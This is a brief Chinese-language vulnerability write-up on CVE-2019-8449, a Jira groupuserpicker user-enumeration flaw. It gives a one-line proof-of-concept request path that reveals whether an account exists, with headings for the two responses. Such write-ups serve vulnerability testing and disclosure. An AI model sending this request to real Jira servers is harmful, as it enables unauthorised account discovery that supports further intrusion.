Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449¶
漏洞描述¶
Atlassian Jira groupuserpicker接口存在用户信息枚举漏洞,攻击者通过漏洞可以获取应用中的使用者账户名称,来进行进一步渗透
漏洞影响¶
网络测绘¶
漏洞复现¶
登录页面
验证POC
/rest/api/latest/groupuserpicker?query=admin&maxResults=50&showAvatar=false
当用户存在时
当用户不存在时
